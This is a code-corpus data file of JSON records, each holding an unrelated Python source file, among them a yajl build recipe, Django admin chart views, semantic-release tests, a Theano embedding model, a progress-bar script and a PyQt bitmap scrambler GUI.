+{"seq_id":"507951121","text":"import info\n\nfrom Package.CMakePackageBase import *\n\n\nclass subinfo(info.infoclass):\n def setTargets(self):\n self.description = 'Yet Another JSON Library'\n\n self.svnTargets['master'] = 'https://github.com/lloyd/yajl'\n\n ver = '1.0.12'\n\n self.targets[ver] = 'http://github.com/lloyd/yajl/tarball/%s' % ver\n self.archiveNames[ver] = 'lloyd-yajl-%s.tar.gz' % ver\n self.targetDigests[ver] = 'f0177e3a946d6ae9a0a963695b2c143a03219bf2'\n self.patchToApply[ver] = ('lloyd-yajl-17b1790-20110725.diff', 1)\n self.targetInstSrc[ver] = 'lloyd-yajl-17b1790'\n\n self.defaultTarget = ver\n\n def setDependencies(self):\n self.runtimeDependencies[\"virtual/base\"] = None\n\n\nclass Package(CMakePackageBase):\n def __init__(self):\n CMakePackageBase.__init__(self)\n","sub_path":"libs/yajl/yajl.py","file_name":"yajl.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"97561843","text":"\n_METRICS_TABLE = 'metrics'\n_JOURNAL_TABLE = 'rollups_journal'\n_ROLLUP_TABLE_PREFIX = 'rollups'\n\n_METRICS_TABLE_STMT = \"\"\"CREATE TABLE IF NOT EXISTS {keyspace}.{metrics_table} (\n\tmetric_id ascii,\n\tts_rotation timestamp,\n\tshard int,\n\n\tmetric_key ascii,\n\tuuid timeuuid,\n\n\tvalue int,\n\n\tPRIMARY KEY ((metric_id, ts_rotation, shard), metric_key, uuid)\n) WITH COMPACT STORAGE ;\"\"\"\n\n\n_ROLLUP_TABLE_STMT = \"\"\"CREATE TABLE IF NOT EXISTS {keyspace}.{rollup_table} (\n\tmetric_id ascii,\n\tts timestamp,\n\tshard int,\n\n\tmetric_key ascii,\n\n\tvalue 
bigint,\n\n\tPRIMARY KEY ((metric_id, ts, shard), metric_key)\n)\nWITH COMPACT STORAGE ;\"\"\"\n\n_JOURNAL_TABLE_STMT = \"\"\"CREATE TABLE IF NOT EXISTS {keyspace}.{journal_table} (\n\tmetric_id ascii,\n\trollup int,\n\n\tshard_from int,\n\tshard_to int,\n\n\tts timestamp,\n\n\tstate int,\n\n\tPRIMARY KEY ((metric_id, rollup, shard_from, shard_to), ts)\n)\nWITH CLUSTERING ORDER BY (ts DESC) ;\"\"\"\n\n\nclass Schema(object):\n\n\tdef __init__(self, session, keyspace, rollups):\n\t\tself._session = session\n\t\tself._keyspace = keyspace\n\n\t\tself.metrics_table = _METRICS_TABLE\n\t\tself.journal_table = _JOURNAL_TABLE\n\t\tself.rollup_tables = {rollup: '%s_%s' % (_ROLLUP_TABLE_PREFIX, rollup) for rollup, ttl in rollups}\n\n\tdef create_tables(self):\n\t\tself._session.execute(_METRICS_TABLE_STMT.format(keyspace=self._keyspace, metrics_table=self.metrics_table))\n\t\tself._session.execute(_JOURNAL_TABLE_STMT.format(keyspace=self._keyspace, journal_table=self.journal_table))\n\n\t\tfor rollup, table_name in self.rollup_tables.iteritems():\n\t\t\tself._session.execute(_ROLLUP_TABLE_STMT.format(keyspace=self._keyspace, rollup_table=table_name))\n\n","sub_path":"sheepy/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"279206150","text":"import json\n\nfrom django.contrib import admin\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import Count\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.models import Group\nfrom django.db.models.functions import TruncDay\n\nfrom .models import *\n\nadmin.site.register(Customer)\n\n@admin.register(Magazine)\nclass MagazineAdmin(admin.ModelAdmin):\n list_display = (\"name\", \"dateCreated\", \"viewcount\")\n ordering = (\"-dateCreated\",)\n\n def changelist_view(self, request, extra_context=None):\n # each column data of name, viewcount, and magazineGroup in Magazine objects\n magazine_data = (\n Magazine.objects.values('name', 'viewcount', 'magazineGroup')\n )\n\n # each column data of username and groups in User objects\n user_groups_data = (\n list(User.objects.values_list('username','groups'))\n )\n\n # each column data of id and name in Group objects\n groups_data = (\n list(Group.objects.values('id', 'name'))\n )\n\n # Serialize and attach the chart data to the template context\n as_json_magazine = json.dumps(list(magazine_data), cls=DjangoJSONEncoder)\n as_json_user = json.dumps(list(user_groups_data), cls=DjangoJSONEncoder)\n as_json_groups = json.dumps(list(groups_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"magazine_data\": as_json_magazine, \"user_groups_data\": as_json_user, \"groups_data\": as_json_groups}\n\n # Call the superclass changelist_view to render the page\n return super().changelist_view(request, extra_context=extra_context)\n\nclass CustomerAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\", \"email\", \"dataCreated\")\n ordering = (\"-dateCreated\",)\n\n def changelist_view(self, request, extra_context=None):\n # Aggregate new subscribers per day\n chart_data = (\n Customer.objects.annotate(date=TruncDay(\"dataCreated\"))\n .values(\"date\")\n .annotate(y=Count(\"id\"))\n .order_by(\"-date\")\n )\n\n # Serialize and attach the chart data to the template context\n as_json = json.dumps(list(chart_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"chart_data\": as_json}\n\n # Call the superclass 
changelist_view to render the page\n return super().changelist_view(request, extra_context=extra_context)\n\nclass PostImageAdmin(admin.StackedInline):\n model = PostImage\n\n\n@admin.register(Post)\nclass PostAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"title\", \"dateCreated\", \"viewcount\") \n ordering = (\"-dateCreated\",)\n\n def changelist_view(self, request, extra_context=None):\n\n # each column data of title and viewcount in Post objects\n chart_data = (\n Post.objects.values('title', 'viewcount')\n )\n\n # Serialize and attach the chart data to the template context\n as_json = json.dumps(list(chart_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"chart_data\": as_json}\n\n # Call the superclass changelist_view to render the page\n return super().changelist_view(request, extra_context=extra_context)\n inlines = [PostImageAdmin]\n\n class Meta:\n model = Post\n\n@admin.register(PostImage)\nclass PostImageAdmin(admin.ModelAdmin):\n pass","sub_path":"ivyMagazine/magazines/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"647734399","text":"\nfor i in range(0, loopNum):\n\tsubprocess.check_call(cmdResetSpin.strip().split(\" \"))\n\tsubprocess.check_call(cmdResetTable.strip().split(\" \"))\n\tstartTime = time.time()\n\tresetResult = subprocess.check_output( cmdReset.strip().split(\" \"))\n\tsbResult = subprocess.check_output( cmdSb.strip().split(\" \"))\n\tgetResult = subprocess.check_output( cmdGet.strip().split(\" \"))\n\tendTime = time.time()\n\tsubprocess.check_call(cmdStopTable.strip().split(\" \"))\n\n\tlog.write(str(i + 1) + \" > \")\n\tminTime = minPatarn.search(sbResult)\n\tlog.write(\"min: \" + minTime.group(1) + \"ms\\n\")\n\tmaxTime = maxPatarn.search(sbResult)\n\tlog.write(\"max: \" + maxTime.group(1) + \"ms\\n\")\n\tavgTime = avgPatarn.search(sbResult)\n\tlog.write(\"avg: \" + avgTime.group(1) + \"ms\\n\")\n\tlog.write(\"ple: \" + getResult)\n\n\texecutionTime = executionTime + (endTime - startTime)\n\tpleTotal = pleTotal + int(getResult)\n\tavgTotal = avgTotal + float(avgTime.group(1))\n\tsubprocess.Popen(cmdShow.strip().split(\" \"), stdout=pleData)\n\tsubprocess.Popen(cmdModifySpin.strip().split(\" \"), stdout=spinlockData)\n\ncsvDetailWriter.writerow(detailListData)\n","sub_path":"thesis/spinCounter.py","file_name":"spinCounter.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361850208","text":"import json\nfrom unittest import TestCase\n\nimport responses\n\nfrom semantic_release.errors import ImproperConfigurationError\nfrom semantic_release.hvcs import Github, check_build_status, get_hvcs\n\nfrom . 
import mock\n\n\nclass HCVSHelperTests(TestCase):\n def test_get_hvcs_should_return_github(self):\n self.assertEqual(get_hvcs(), Github)\n\n @mock.patch('semantic_release.hvcs.config.get', lambda *x: 'doesnotexist')\n def test_get_hvcs_should_raise_improper_config(self):\n self.assertRaises(ImproperConfigurationError, get_hvcs)\n\n @mock.patch('semantic_release.hvcs.Github.check_build_status')\n def test_check_build_status(self, mock_github_helper):\n check_build_status('owner', 'name', 'ref')\n mock_github_helper.assert_called_once_with('owner', 'name', 'ref')\n\n\nclass GithubCheckBuildStatusTests(TestCase):\n url = ('https://api.github.com/repos/relekang/rmoq/commits/'\n '6dcb09b5b57875f334f61aebed695e2e4193db5e/status')\n\n def get_response(self, status):\n return json.dumps({\n \"state\": status,\n \"sha\": \"6dcb09b5b57875f334f61aebed695e2e4193db5e\",\n \"total_count\": 2,\n })\n\n @responses.activate\n def test_should_return_false_if_pending(self):\n responses.add(\n responses.GET,\n self.url,\n body=self.get_response('pending'),\n content_type='application/json'\n )\n self.assertFalse(Github.check_build_status('relekang', 'rmoq',\n '6dcb09b5b57875f334f61aebed695e2e4193db5e'))\n\n @responses.activate\n def test_should_return_false_if_failure(self):\n responses.add(\n responses.GET,\n self.url,\n body=self.get_response('failure'),\n content_type='application/json'\n )\n self.assertFalse(Github.check_build_status('relekang', 'rmoq',\n '6dcb09b5b57875f334f61aebed695e2e4193db5e'))\n\n @responses.activate\n def test_should_return_true_if_success(self):\n responses.add(\n responses.GET,\n self.url,\n body=self.get_response('success'),\n content_type='application/json'\n )\n self.assertTrue(Github.check_build_status('relekang', 'rmoq',\n '6dcb09b5b57875f334f61aebed695e2e4193db5e'))\n","sub_path":"tests/test_hvcs.py","file_name":"test_hvcs.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155446838","text":"import requests\nfrom lxml import etree\n\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n}#请求头\n\nurl = 'https://www.qiushibaike.com/hot/text/'\nres = requests.get(url,headers = headers)\nselector = etree.HTML(res.text)\nid = selector.xpath('//*[@id=\"qiushi_tag_120325407\"]/div[1]/a[2]/h2/text()')\nprint(id)\n","sub_path":"spider/零散单子/xapth测试-糗事百科.py","file_name":"xapth测试-糗事百科.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71282768","text":"#encoding=utf-8\r\n'''\r\n@author: Liu Zemin\r\nFunctions and Application : \r\nmodel\r\n'''\r\n\r\nimport numpy\r\nimport theano\r\nfrom theano import tensor\r\nfrom theano.ifelse import ifelse\r\nimport directedGraphLSTMModel\r\n\r\ndef proxEmbedBySubgraphModel(options, tparams):\r\n \"\"\"\r\n \"\"\"\r\n trainingPairs=tensor.tensor3('trainingPairs',dtype='int64') # 3D tensor,shape=#(triples)*4*2\r\n xs=tensor.matrix('xs', dtype='int64') # shape=nsamples*maxlen\r\n masks=tensor.tensor3('masks', dtype=theano.config.floatX) # @UndefinedVariable # shape=nsamples*maxlen*maxlen\r\n subgraph_lens=tensor.vector('subgraph_lens', dtype='int64') # shape=nsamples*0\r\n lengths=tensor.vector('lengths',dtype='int64') # shape=#(xs) * 0\r\n wordsEmbeddings=tensor.matrix('wordsEmbeddings', dtype=theano.config.floatX) # @UndefinedVariable # shape=#(words) * 
wordsDimension\r\n \r\n buffer_tensor=tensor.tensor3('buffer_tensor', dtype=theano.config.floatX) # @UndefinedVariable # shape=maxlen*maxlen*dimension\r\n nodesLens=tensor.matrix('nodesLens', dtype='int64') # shape=nsamples*maxlen\r\n \r\n def _processTuple(index , lossSum):\r\n tuple=trainingPairs[index] \r\n \r\n def _processSubgraph(i):\r\n length=lengths[i]\r\n x=xs[i,:length] \r\n mask=masks[i,:length,:length] \r\n nodesLen=nodesLens[i,:length] \r\n emb=directedGraphLSTMModel.directedGraphLSTMModel(options, tparams, x, mask, wordsEmbeddings, buffer_tensor, nodesLen) \r\n return emb \r\n \r\n def iftFunc(): \r\n embx=tensor.zeros(options['dimension'],).astype(theano.config.floatX) # @UndefinedVariable \r\n return embx\r\n \r\n def iffFunc(start, end):\r\n embx=None\r\n rval,update=theano.scan(\r\n _processSubgraph,\r\n sequences=tensor.arange(start,end), \r\n )\r\n subgraph_len=subgraph_lens[start:end] \r\n \r\n rval=discountModel(options['discount_alpha'], subgraph_len)[:,None]*rval\r\n embx=rval.max(axis=0)\r\n \r\n return embx\r\n \r\n start=tuple[0][0] \r\n end=tuple[1][1] \r\n emb1=None \r\n emb1=iffFunc(start,end)\r\n \r\n start=tuple[2][0] \r\n end=tuple[3][1]\r\n emb2=None \r\n emb2=iffFunc(start,end)\r\n \r\n loss=0\r\n param=options['objective_function_param'] \r\n if options['objective_function_method']=='sigmoid': \r\n loss=-tensor.log(tensor.nnet.sigmoid(param*(tensor.dot(emb1,tparams['w'])-tensor.dot(emb2,tparams['w'])))) # sigmoid\r\n else: # hinge-loss\r\n value=param + tensor.dot(emb2,tparams['w']) - tensor.dot(emb1,tparams['w'])\r\n loss=value*(value>0)\r\n \r\n return tensor.cast(loss+lossSum, theano.config.floatX) # @UndefinedVariable\r\n \r\n rval, update=theano.scan(\r\n _processTuple,\r\n sequences=tensor.arange(trainingPairs.shape[0]), \r\n outputs_info=tensor.constant(0., dtype=theano.config.floatX), # @UndefinedVariable\r\n )\r\n \r\n cost=rval[-1]\r\n cost+=options['decay']*(tparams['Wi'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Wf'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Wo'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Wc'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Ui'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Uf'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Uo'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Uc'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bi'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bf'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bo'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bc'] ** 2).sum()\r\n \r\n return trainingPairs, xs, masks, lengths, subgraph_lens, wordsEmbeddings, buffer_tensor, nodesLens, cost\r\n\r\n\r\ndef discountModel(alpha,length):\r\n \"\"\"\r\n discount\r\n \"\"\"\r\n return tensor.exp(alpha*length*(-1))\r\n","sub_path":"D2AGE/symmetric/proxEmbedBySubgraphModel.py","file_name":"proxEmbedBySubgraphModel.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"218514128","text":"#!/usr/bin/python3.8\n\nimport sys\nimport os\nimport string\nimport re\nimport time\nimport subprocess\nimport datetime\nfrom sys import argv\n\n# import library\nscript_path = os.path.dirname(__file__)\nlib_path = script_path + \"/../../lib/pyLib\"\nsys.path.append(lib_path)\n\nfrom tqdm import tqdm\n\ndef progress_observe(base_bar_name, full_bar, speed_low, speed_high, max_count, finish_flag, error_flag):\n count = 0\n while (not os.path.exists(finish_flag)):\n if count == 0:\n 
bar_name = base_bar_name\n            progress_bar(bar_name, full_bar, speed_low, speed_high, finish_flag, error_flag)\n        else:\n            print (base_bar_name, \": is nearly done, let's wait one more time!\")\n            bar_name = base_bar_name + ' (' + str(count) + ')'\n            progress_bar(bar_name, full_bar, speed_low, speed_high, finish_flag, error_flag)\n        count += 1\n        if count == max_count:\n            print (\"Progress %s is taking too long!\" % base_bar_name)\n            break\n\ndef progress_bar(bar_name, full_bar, speed_low, speed_high, finish_flag, error_flag):\n    with tqdm(total=full_bar, desc=bar_name, bar_format=\"{l_bar}{bar} [ time left: {remaining} ]\") as pbar:\n        for i in range(full_bar):\n            if os.path.exists(error_flag):\n                print (\"ERROR FOUND! Please check Error.log\")\n                stop_progress()\n            if os.path.exists(finish_flag):\n                pbar.n = full_bar\n                pbar.refresh()\n            else:\n                time.sleep(speed_low)\n                pbar.update()\n\ndef progress_bar2(bar_name, full_bar, speed_low, speed_high, max_count, finish_flag, error_flag):\n    count = 0\n    with tqdm(total=full_bar, desc=bar_name, bar_format=\"{l_bar}{bar} [ time left: {remaining} ]\") as pbar:\n        if os.path.exists(finish_flag):\n            pbar.n = full_bar\n            pbar.refresh()\n        else:\n            while (not os.path.exists(finish_flag)):\n                for i in range(full_bar):\n                    time.sleep(speed_low)    \n                    if os.path.exists(error_flag):\n                        print (\"ERROR FOUND! Please check Error.log\")\n                        stop_progress()\n                    elif os.path.exists(finish_flag):\n                        pbar.n = full_bar\n                        pbar.refresh()\n                        break\n                    elif count != 0:\n                        pbar.n = i\n                        pbar.refresh()\n                    else:\n                        pbar.update()\n                count = count + 1\n                if count == max_count:\n                    print (\"Progress %s is taking too long!\" % bar_name)  # was base_bar_name, which is undefined in this function\n                    break\n    \ndef remove_finish_flag():\n    if os.path.exists('finish_read_input'):\n        os.remove(\"finish_read_input\")\n    if os.path.exists('finish_gen_rtl'):\n        os.remove(\"finish_gen_rtl\")\n    if os.path.exists('finish_gen_html'):\n        os.remove(\"finish_gen_html\")\n    if os.path.exists('finish_gen_uvm'):\n        os.remove(\"finish_gen_uvm\")\n\ndef stop_progress():\n    remove_finish_flag()\n    open(\"finish_all\", 'w').close()\n    sys.exit()\n    \nremove_finish_flag()\n#progress_observe(\"Read Input Spec \", 100, 0.03, 0.01, 5, \"finish_read_input\", \"Error.log\")\n#progress_observe(\"Generate RTL    \", 100, 0.03, 0.01, 5, \"finish_gen_rtl\", \"Error.log\")\n#progress_observe(\"Generate HTML   \", 100, 0.03, 0.01, 5, \"finish_gen_html\", \"Error.log\")\nprogress_bar2(\"Read Input Spec \", 100, 0.03, 0.01, 15, \"finish_read_input\", \"Error.log\")\nprogress_bar2(\"Generate RTL    \", 100, 0.03, 0.01, 15, \"finish_gen_rtl\", \"Error.log\")\nprogress_bar2(\"Generate HTML   \", 100, 0.03, 0.01, 15, \"finish_gen_html\", \"Error.log\")\nprogress_bar2(\"Generate UVM    \", 100, 0.03, 0.01, 15, \"finish_gen_uvm\", \"Error.log\")\n\nremove_finish_flag()\nopen(\"finish_all\", 'w').close()\n","sub_path":"work/script/progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"354112943","text":"# This Python file uses the following encoding: utf-8\nimport sys\nimport os\nfrom PyQt5.QtWidgets import QApplication, QMainWindow  # must come from PyQt5 to match the widgets below; mixing PySide2 and PyQt5 fails at runtime\nfrom PyQt5 import uic, QtWidgets, QtCore, QtGui\n\nimport random\nimport numpy\nimport io\n\nimport tkinter as tk\nfrom tkinter.filedialog import askopenfilename\n\n\nfrom PIL import Image\nfrom PIL.ImageQt import ImageQt\n\nfrom ScramblerDVB import ScramblerDVB\nfrom ScramblerAES import ScramblerAES\nfrom ScramblerV34 import ScramblerV34\n\nSCRIPT_DIRECTORY = 
os.path.dirname(os.path.abspath(__file__))\n\nclass MainWindow(QtWidgets.QDialog):\n\n def __init__(self):\n #QMainWindow.__init__(self)\n super(MainWindow, self).__init__()\n uic.loadUi(os.path.join(SCRIPT_DIRECTORY, 'scramblergui.ui'), self)\n\n #setting up DVB event handlers\n self.loadFileBtnDVB.clicked.connect(self.loadButtonClicked)\n self.scrambleBtnDVB.clicked.connect(self.scrambleDVBButtonClicked)\n self.descrambleBtnDVB.clicked.connect(self.descrambleDVBButtonClicked)\n\n #setting up V34 event handlers\n self.loadFileBtnV34.clicked.connect(self.loadButtonClicked)\n self.scrambleBtnV34.clicked.connect(self.scrambleV34ButtonClicked)\n self.descrambleBtnV34.clicked.connect(self.descrambleV34ButtonClicked)\n\n #setting up AES event handlers\n self.loadFileBtnAES.clicked.connect(self.loadButtonClicked)\n self.scrambleBtnAES.clicked.connect(self.scrambleAESButtonClicked)\n self.descrambleBtnAES.clicked.connect(self.descrambleAESButtonClicked)\n\n self.show()\n\n self.input_bnp = 0\n self.size_of_bitmap = 0\n self.raw_binary = []\n self.img = 0\n\n self.scramblerDVB = 0\n self.output_imageDVB = 0\n self.noisedImageDVB = 0\n\n self.AES = 0\n self.output_imageAES = 0\n self.noisedImageAES = 0\n self.noisedImageAES_raw = []\n\n self.scramblerV34 = 0\n self.output_imageV34 = 0\n self.noisedImageV34 = 0\n\n self.output_imageNoise = 0\n self.noisedImage_raw = []\n self.diffImage = 0\n\n\n # scramble V34 button event handler\n def scrambleV34ButtonClicked(self):\n if self.size_of_bitmap == 0: # return if no image found\n return\n\n self.scramblerV34 = ScramblerV34(self.size_of_bitmap, self.raw_binary, self.textBrowserV34)\n\n scrambledImage = self.scramblerV34.scramble()\n self.noisedImageV34 = self.addNoise(scrambledImage, int(self.comboBoxV34.currentText() ))\n\n self.output_imageV34 = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageV34.load()\n for i in range(self.output_imageV34.size[0]): # For every pixel:\n for j in range(self.output_imageV34.size[1]):\n pixels[i, j] = self.noisedImageV34[(self.size_of_bitmap * i) + j]\n\n\n self.showResultInGUI(self.afterImgLabelV34, self.output_imageV34)\n\n\n\n # descramble V34 button event handler\n def descrambleV34ButtonClicked(self):\n if self.scramblerV34 == 0: # return if scrambling hasn't been done\n return\n\n descrambledImage = self.scramblerV34.descramble(self.noisedImageV34)\n self.output_imageV34 = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageV34.load()\n\n for i in range(self.output_imageV34.size[0]): # For every pixel:\n for j in range(self.output_imageV34.size[1]):\n pixels[i, j] = descrambledImage[(self.size_of_bitmap * i) + j]\n\n\n self.showResultInGUI(self.afterImgLabelV34, self.output_imageV34)\n\n self.setupDiffImage(self.scramblerV34)\n self.showResultInGUI(self.diffLabelV34, self.diffImage)\n\n\n\n # scramble AES button event handler\n def scrambleAESButtonClicked(self):\n if self.size_of_bitmap == 0:\n return\n\n self.AES = ScramblerAES(self.size_of_bitmap, self.raw_binary, self.textBrowserAES)\n self.textBrowserAES.append( str(self.AES.key) )\n\n encryptedImage = self.AES.encrypt()\n\n self.showResultInGUI(self.afterImgLabelAES, encryptedImage)\n\n\n\n # descramble AES button event handler\n def descrambleAESButtonClicked(self):\n if self.AES == 0: # return if scrambling hasn't been done\n return\n\n decryptedImage = self.AES.decrypt()\n\n self.output_imageAES = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = 
self.output_imageAES.load()\n\n for i in range(self.output_imageAES.size[0]): # For every pixel:\n for j in range(self.output_imageAES.size[1]):\n pixels[i, j] = decryptedImage[(self.size_of_bitmap * i) + j]\n\n self.showResultInGUI(self.afterImgLabelAES, self.output_imageAES)\n\n\n\n #scramble DVB button event handler\n def scrambleDVBButtonClicked(self):\n if self.size_of_bitmap == 0: # return if no image found\n return\n\n self.scramblerDVB = ScramblerDVB(self.size_of_bitmap, self.raw_binary, self.textBrowserDVB)\n scrambledImage = self.scramblerDVB.scramble()\n self.noisedImageDVB = self.addNoise(scrambledImage, int(self.comboBoxDVB.currentText() ))\n\n self.textBrowserDVB.append( str(self.noisedImageDVB) )\n self.output_imageDVB = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageDVB.load()\n for i in range(self.output_imageDVB.size[0]): # For every pixel:\n for j in range(self.output_imageDVB.size[1]):\n pixels[i, j] = self.noisedImageDVB[(self.size_of_bitmap * i) + j]\n #pixels[i, j] = scrambledImage[(self.size_of_bitmap * i) + j]\n\n self.showResultInGUI(self.afterImgLabelDVB, self.output_imageDVB)\n self.showResultInGUI(self.afterImgLabelDVB, self.output_imageDVB)\n\n\n\n #descramble DVB button event handler\n def descrambleDVBButtonClicked(self):\n if self.scramblerDVB == 0: #catch if no image to descramble\n return\n\n descrambledImage = self.scramblerDVB.descramble(self.noisedImageDVB)\n self.output_imageDVB = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageDVB.load()\n\n for i in range(self.output_imageDVB.size[0]): # For every pixel:\n for j in range(self.output_imageDVB.size[1]):\n pixels[i, j] = descrambledImage[(self.size_of_bitmap * i) + j]\n\n self.showResultInGUI(self.afterImgLabelDVB, self.output_imageDVB)\n\n self.setupDiffImage(self.scramblerDVB)\n self.showResultInGUI(self.diffLabelDVB, self.diffImage)\n\n\n\n # calculating image difference\n def setupDiffImage(self, scrambler):\n output_diff = []\n for i in range(len(self.noisedImage_raw)):\n newPixel = scrambler.descrambler_output[i] ^ self.raw_binary[i]\n output_diff.append(newPixel)\n\n self.diffImage = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.diffImage.load()\n\n for i in range(self.diffImage.size[0]): # For every pixel:\n for j in range(self.diffImage.size[1]):\n pixels[i, j] = output_diff[(self.size_of_bitmap * i) + j]\n\n\n\n #load button event handler\n def loadButtonClicked(self):\n self.showLoadDialog()\n self.loadImage()\n\n\n\n #shows menu for choosing .bnp file\n def showLoadDialog(self):\n root = tk.Tk()\n root.withdraw()\n self.input_bnp = askopenfilename()\n\n\n\n # shows an image in the chosen label\n def showImageInGUI(self, label, imagePath):\n myPixmap = QtGui.QPixmap( imagePath )\n myScaledPixmap = myPixmap.scaled(label.size(), QtCore.Qt.KeepAspectRatio)\n label.setPixmap(myScaledPixmap)\n\n\n\n def showResultInGUI(self, label, image):\n imQt = QtGui.QImage(ImageQt(image))\n myPixmap = QtGui.QPixmap.fromImage( imQt )\n\n myScaledPixmap = myPixmap.scaled(label.size(), QtCore.Qt.KeepAspectRatio)\n label.setPixmap(myScaledPixmap)\n\n\n\n # reading bitmap from file and writing pixel data into an array\n def loadImage(self):\n if not self.input_bnp: #return if no image was loaded\n return\n\n self.raw_binary.clear() # clearing raw_binary in case it wasn't empty\n\n self.img = Image.open(self.input_bnp)\n\n thresh = 200\n fn = lambda x : 1 if x > thresh else 0\n self.img = 
self.img.convert('L').point(fn, mode='1')\n\n        self.size_of_bitmap = self.img.size[0]\n        pixels = self.img.load()\n        for i in range(self.img.size[0]):\n            for j in range(self.img.size[1]):\n                self.raw_binary.append(pixels[i, j])\n\n        # setting noise strength to the value of current tab's value\n        if self.tabWidget.currentIndex() == 0:\n            noiseStrength = int(self.comboBoxDVB.currentText())\n        elif self.tabWidget.currentIndex() == 1:\n            noiseStrength = int(self.comboBoxV34.currentText())\n        elif self.tabWidget.currentIndex() == 2:\n            noiseStrength = int(self.comboBoxAES.currentText())\n\n        self.noisedImage_raw = self.addNoise(self.raw_binary, noiseStrength)\n\n        self.output_imageNoise = Image.new('1', (self.img.size[0], self.img.size[1]))\n        pixels = self.output_imageNoise.load()\n\n        for i in range(self.output_imageNoise.size[0]): # For every pixel:\n            for j in range(self.output_imageNoise.size[1]):\n                pixels[i, j] = self.noisedImage_raw[(self.size_of_bitmap * i) + j]\n\n\n        self.showResultInGUI(self.beforeImgLabelAES, self.output_imageNoise)\n        self.showResultInGUI(self.beforeImgLabelDVB, self.output_imageNoise)\n        self.showResultInGUI(self.beforeImgLabelV34, self.output_imageNoise)\n\n\n\n    def addNoise(self, rawImage, noiseRatio):\n        zeroCounter = 0\n        oneCounter = 0\n        noisedImage = []\n        for i in range( len(rawImage) ):\n            if rawImage[i] == 0:\n                zeroCounter += 1\n                oneCounter = 0\n            elif rawImage[i] == 1:\n                oneCounter += 1\n                zeroCounter = 0\n\n            noiseProb = (zeroCounter + oneCounter) / noiseRatio\n            newRandom = random.randint(0, 100)\n            if newRandom < noiseProb:\n                noisedImage.append(1^rawImage[i]) # swap the bit\n            else:\n                noisedImage.append(rawImage[i])\n\n        return noisedImage\n\n\n\n\n\n\nif __name__ == \"__main__\":\n    app = QApplication([])\n    window = MainWindow()\n    window.show()\n    sys.exit(app.exec_())\n\n\n######################################\n######################################\n\n\n# WHITE DOTS = DIFF IN IMAGES\n\n","sub_path":"ScramblersGUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"399124045","text":"from tkinter import *\n\ndef string(n):\n    if n == 0:\n        print(\"ноль\")\n        return\n    units = [' ', 'один', 'два', 'три', 'четыре', 'пять', 'шесть', 'семь', 'восемь', 'девять']\n    dozens = [' ', 'десять', 'двадцать', 'тридцать', 'сорок', 'пятьдесят', 'шестьдесят', 'семьдесят', 'восемьдесят',\n              'девяносто']\n    hundreds = [' ', 'сто', 'двести', 'триста', 'четыреста', 'пятьсот', 'шестьсот', 'семьсот', 'восемьсот', 'девятьсот']\n    thousands = [' ', 'одна тысяча', 'две тысячи', 'три тысячи', 'четыре тысячи', 'пять тысяч', 'шесть тысяч',\n                 'семь тысяч', 'восемь тысяч', 'девять тысяч']\n    tricks = [' ', 'одиннадцать', 'двенадцать', 'тринадцать', 'четырнадцать', 'пятнадцать', 'шестнадцать',\n              'семнадцать', 'восемнадцать', 'девятнадцать']\n    new_thousands = (n % 10000) // 1000\n    new_hundreds = (n % 1000) // 100\n    new_dozens = (n % 100) // 10\n    new_units = n % 10\n\n    if len(str(n)) == 1:\n        print(units[new_units])\n    elif 11 <= n <= 19:\n        print(tricks[n - 10])\n    elif len(str(n)) == 2:\n        print(dozens[new_dozens], units[new_units])\n    elif len(str(n)) == 3:\n        print(hundreds[new_hundreds], dozens[new_dozens], units[new_units])\n    elif len(str(n)) == 4:\n        print(thousands[new_thousands], hundreds[new_hundreds], dozens[new_dozens], units[new_units])\n\n\n\nwindow = 